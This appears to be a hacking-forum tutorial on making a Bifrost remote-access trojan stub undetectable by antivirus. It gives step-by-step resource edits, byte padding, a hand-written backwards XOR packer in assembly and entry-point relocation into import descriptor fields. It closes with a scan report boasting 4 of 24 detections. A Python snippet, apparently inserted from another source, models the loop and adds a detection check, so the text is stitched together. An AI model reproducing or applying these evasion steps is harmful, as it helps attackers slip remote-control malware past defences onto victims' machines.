How to undetect Bifrost stubs the manual way by haZl0oh !

Ok guys ....

First of all you need the following tools/stuff:

- Resource Hacker (Reshacker)
- an icon of your choice
- a handy hex editor (your favourite)
- an example PE file to borrow resources from (I chose the Bifrost client)



In this example I took the Bifrost 1.2d stub.
The NoVirusThanks scan was 23/24.






1. Change the icon

Take Reshacker and drag and drop your stub file into it.
Go to the Icon Group resource and open it.

Replace the icon with your favourite one
(better take one that isn't often seen in malware; the stock icons that ship with RAT builders are the first thing anyone recognises).

Save it and step one is done.

2. Borrow a version info resource

Open the PE file you chose (in my case the Bifrost client) in Reshacker and save its Version Info resource to a .res file.

Now close Reshacker, open it again and drag and drop your stub into it.

Now Action >>>> Add a new Resource

Open your saved version info resource:

Resource type: VERSIONINFO
Resource name: 1
Resource language: 1033

(1033 is the language ID for US English; keep whatever the original file used so the resource tree looks normal.)

Save it ... done.


3. Add a manifest

Add a visual styles manifest (resource type 24, RT_MANIFEST, name 1) to your stub.
Do it with any tool that can, or again with Reshacker (by the way, awesome tool, as you can see ... lol).

Once you've added the manifest, step three is done.


4. Pad the file

Add some bytes with your hex editor.
I gave 200 bytes at the end of the file; it works for me, choose yourself.

I also changed the 00 bytes from offset 230 to 3FF to 11.
(That is only safe if the range is padding between the headers and the first section; bytes that belong to the section table or a data directory must stay as they are, or the file will not load.)

Now after all these things the heaviest step comes ....
lol

maybe ...


MANUAL Packing & EP Moving!!!


5.


Some days ago I drove by car and badabang ... I had an idea:
why not XOR a file from back to start?!
I tried it and it worked for me.


Code:
So my code is very easy (call it beginner code):

xor bl, bl                  ; bl = 0
mov esi, END                ; END = address of the last byte you want to pack
dec bl                      ; bl = 0FFh, the XOR key
decode:
xor byte ptr ds:[esi], bl   ; flip one byte                                <<<< ****
dec esi                     ; walk backwards
cmp esi, START              ; START = address of the first byte you want to pack
jge decode                  ; loop while esi >= START, both ends inclusive ****
call OEP                    ; OEP = address of the real original entry point
ret

(jge is a signed compare; that is fine for user-mode addresses below 80000000h, otherwise use jae. The packed range must not include the decoder itself, and the section it writes to needs the writable flag.)
Now move your new EP into the image import descriptor range. The TimeDateStamp and ForwarderChain fields of an import descriptor are ignored by the loader for normal, unbound imports, so a few bytes of code can live there without breaking the imports.

It looks like this here:



========================================


00407D90 . CC7D0000 DD 00007DCC ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407D94 > $ B8 AA7E4000 MOV EAX,jmp_eax_.00407EAA <<<< my EP
00407D99 ? FFE0 JMP EAX
00407D9B ? 90 NOP
00407D9C . 2E7E0000 DD 00007E2E
00407DA0 . 00100000 DD 00001000
00407DA4 . F07D0000 DD 00007DF0 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DA8 . 00000000 DD 00000000
00407DAC . 00000000 DD 00000000
00407DB0 . 4A7E0000 DD 00007E4A
00407DB4 . 24100000 DD 00001024
00407DB8 . 00000000 DD 00000000 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DBC . 00000000 DD 00000000
00407DC0 . 00000000 DD 00000000
00407DC4 . 00000000 DD 00000000
00407DC8 . 00000000 DD 00000000

======================================


The 8 bytes at 00407D94 (MOV EAX / JMP EAX / NOP) sit exactly in the TimeDateStamp and ForwarderChain fields of the first descriptor at 00407D90, which is why the imports still resolve.

Run your XOR loop once in the debugger (XOR with 0FFh is its own inverse, so one pass over the plain code produces the packed bytes that the same loop decodes at run time), then save the patched image as your new UD stub!

Now set the entry point in LordPE to the place where YOU put your NEW EP. LordPE's EntryPoint field is an RVA, so subtract the image base (here 400000h). While you are in LordPE, also check that the section you packed has the writable flag set, otherwise the decoder's first write faults.
My one was here "00407D94" (RVA 7D94).
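As an added example (not the author's code or stub) to check the two mechanical points in this step: a Python model of the backwards-XOR loop, which shows that both bounds are inclusive and that one pass is its own inverse (so the same loop packs offline and unpacks at run time), plus the header check a defender would write for the "entry point inside the import directory" trick. The PE built below is a constructed header-only PE32 image carrying only the RVAs from the listing (import directory at 7D90h, three descriptors = 3Ch bytes, entry point 7D94h); the decoder length and the packed range in the demo are assumed, and all function names are mine.

```python
import struct

KEY = 0xFF  # xor bl,bl / dec bl leaves bl = 0FFh


def xor_region(image: bytes, start: int, end: int, key: int = KEY) -> bytearray:
    """Model of the loop from step 5: esi starts at END, xors one byte,
    decrements, and repeats while esi >= START (cmp/jge), so both bounds
    are inclusive. Returns a new buffer; the input is left untouched."""
    out = bytearray(image)
    esi = end
    while esi >= start:
        out[esi] ^= key
        esi -= 1
    return out


def decoder_overlaps_region(dec_start: int, dec_end: int, start: int, end: int) -> bool:
    """True if the decoder itself lies inside the packed range; it would
    then corrupt its own instructions on the first iterations."""
    return dec_start <= end and start <= dec_end


def build_min_pe(entry_rva: int, imp_rva: int, imp_size: int) -> bytes:
    """Constructed header-only PE32 image: only the fields the check reads
    are filled (e_lfanew, PE signature, COFF header, optional header)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)   # i386, opt hdr 224 bytes
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, imp_rva, imp_size)     # DataDirectory[1] = import
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def entry_point_in_import_dir(pe: bytes) -> bool:
    """Detection check: does AddressOfEntryPoint fall inside the import data
    directory? No linker puts code there, so a hit is a strong signal."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20                                         # after signature + COFF header
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry = struct.unpack_from("<I", pe, opt + 16)[0]
    imp_rva, imp_size = struct.unpack_from("<II", pe, opt + 96 + 8 * 1)
    return imp_size != 0 and imp_rva <= entry < imp_rva + imp_size


if __name__ == "__main__":
    # constructed "code" bytes: pack offline, then run the same loop as the decoder would
    plain = bytes(range(0x20))
    packed = xor_region(plain, 4, 11)
    assert packed[4:12] == bytes(b ^ KEY for b in plain[4:12]) and packed[:4] == plain[:4]
    assert xor_region(packed, 4, 11) == plain                       # one pass undoes the other
    # RVAs from the listing: import dir 7D90h, 3 descriptors (3Ch bytes), EP 7D94h
    stub = build_min_pe(0x7D94, 0x7D90, 0x3C)
    print("entry point inside import directory:", entry_point_in_import_dir(stub))
    # decoder start 7EAAh is from the listing; its end and the packed range are assumed
    print("decoder 7EAAh..7EC4h overlaps packed 1000h..7D00h:",
          decoder_overlaps_region(0x7EAA, 0x7EC4, 0x1000, 0x7D00))
```

The overlap check is the one to run before you set START and END: the decoder at 407EAA lives after the import table, so a range that stops before the import directory keeps both the decoder and the descriptors intact.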


And it's done. With these easy steps your stub is undetected by most AVs (4 of 24 below).
I scanned mine and it was:


File Info

Report generated: 24.1.2009 at 23.27.26 (GMT 1)
Filename: 123.exe
File size: 80 KB
MD5 Hash: 980763A46F83883B1CAD7558411A5557
SHA1 Hash: B927C0FDA27210C59F366F2167866832B0430374
Packer detected: PEncrypt 3.1 Final -> junkcode [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 4 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - GenPack:RAT.Spy.Banker.AAUT
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - W32/Midgare.A.gen!Eldorado
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Win32/Bifrose.NFJ
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - RAT.Win32.Midgare.hhn
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org




I won't post my stub here because I want the users to test it by themselves!

If you like it, give me some thanks or reputation ....